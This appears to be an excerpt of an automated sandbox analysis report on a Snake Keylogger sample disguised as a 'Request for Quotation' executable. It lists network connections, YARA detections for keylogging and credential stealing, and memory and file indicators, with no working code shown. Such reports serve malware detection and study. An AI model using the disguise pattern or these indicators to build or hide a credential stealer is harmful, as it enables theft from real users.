                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003278000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2

                System Summary

                barindex
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\0009\
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\PerfStringBackup.TMP
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_0153D51C0_2_0153D51C
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_0741CD7B0_2_0741CD7B
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_074153500_2_07415350
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_074173A80_2_074173A8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_07414F180_2_07414F18
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_07416E8A0_2_07416E8A
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_07416E980_2_07416E98
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_07414AE00_2_07414AE0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162C19B9_2_0162C19B
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162A0889_2_0162A088
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_016253629_2_01625362
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162D2789_2_0162D278
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162D5489_2_0162D548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162C4689_2_0162C468
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162C7389_2_0162C738
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_016269A09_2_016269A0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162E9889_2_0162E988
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162CA089_2_0162CA08
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162CCD89_2_0162CCD8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_01626FC89_2_01626FC8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162CFAC9_2_0162CFAC
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162F9619_2_0162F961
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_0162E97C9_2_0162E97C
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_016229EC9_2_016229EC
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_01623AB19_2_01623AB1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_01623E099_2_01623E09
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE1E809_2_06DE1E80
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE17A09_2_06DE17A0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE9C709_2_06DE9C70
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEFC689_2_06DEFC68
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE95489_2_06DE9548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE0B309_2_06DE0B30
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE50289_2_06DE5028
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE29689_2_06DE2968
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEE6B09_2_06DEE6B0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEE6A09_2_06DEE6A0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE1E709_2_06DE1E70
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEDE009_2_06DEDE00
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE178F9_2_06DE178F
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEEF519_2_06DEEF51
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEEF609_2_06DEEF60
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DECC8F9_2_06DECC8F
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DECCA09_2_06DECCA0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEDDFF9_2_06DEDDFF
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DED5509_2_06DED550
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DED5409_2_06DED540
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEEAF89_2_06DEEAF8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEE2589_2_06DEE258
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEE2499_2_06DEE249
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE9BFB9_2_06DE9BFB
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE8B919_2_06DE8B91
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEF3B89_2_06DEF3B8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEF3A89_2_06DEF3A8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE8BA09_2_06DE8BA0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEEB089_2_06DEEB08
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE93289_2_06DE9328
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE0B209_2_06DE0B20
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DED0F89_2_06DED0F8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE00409_2_06DE0040
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE50189_2_06DE5018
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEF8109_2_06DEF810
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE00079_2_06DE0007
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DEF8019_2_06DEF801
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DED9999_2_06DED999
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DED9A89_2_06DED9A8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_0111D51C10_2_0111D51C
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053D502010_2_053D5020
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053D936010_2_053D9360
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053D7FAE10_2_053D7FAE
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053DC52010_2_053DC520
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053DC51A10_2_053DC51A
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053DC4E710_2_053DC4E7
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053D934F10_2_053D934F
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269D28B14_2_0269D28B
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269C1AB14_2_0269C1AB
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269C74B14_2_0269C74B
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269C47B14_2_0269C47B
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269CA1B14_2_0269CA1B
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_026969A014_2_026969A0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269E98814_2_0269E988
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_02693E0914_2_02693E09
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_02696FC814_2_02696FC8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269CFBB14_2_0269CFBB
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269CCEB14_2_0269CCEB
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_02699DE014_2_02699DE0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269538314_2_02695383
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_02693AA114_2_02693AA1
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269F97414_2_0269F974
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_026929EC14_2_026929EC
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_06551E8014_2_06551E80
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_06550B3014_2_06550B30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_065517A014_2_065517A0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655FC6814_2_0655FC68
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_06559C1814_2_06559C18
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655502814_2_06555028
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655954814_2_06559548
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655296814_2_06552968
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655E25814_2_0655E258
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655E24A14_2_0655E24A
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_06551E7014_2_06551E70
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655DE0014_2_0655DE00
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655EAF814_2_0655EAF8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655E6B014_2_0655E6B0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655E6AF14_2_0655E6AF
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655EF6014_2_0655EF60
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655EB0814_2_0655EB08
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_06550B2014_2_06550B20
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655178F14_2_0655178F
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655F3B814_2_0655F3B8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_06558BA014_2_06558BA0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655004014_2_06550040
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655F81014_2_0655F810
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655501814_2_06555018
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655F80214_2_0655F802
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655003F14_2_0655003F
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655D0F814_2_0655D0F8
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655CCA014_2_0655CCA0
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655D55014_2_0655D550
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655D54014_2_0655D540
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655DDFF14_2_0655DDFF
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655D9A714_2_0655D9A7
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0655D9A814_2_0655D9A8
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1418858340.00000000057F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1412513003.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.000000000434B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1419550863.0000000007CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3825388086.0000000000FD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeBinary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
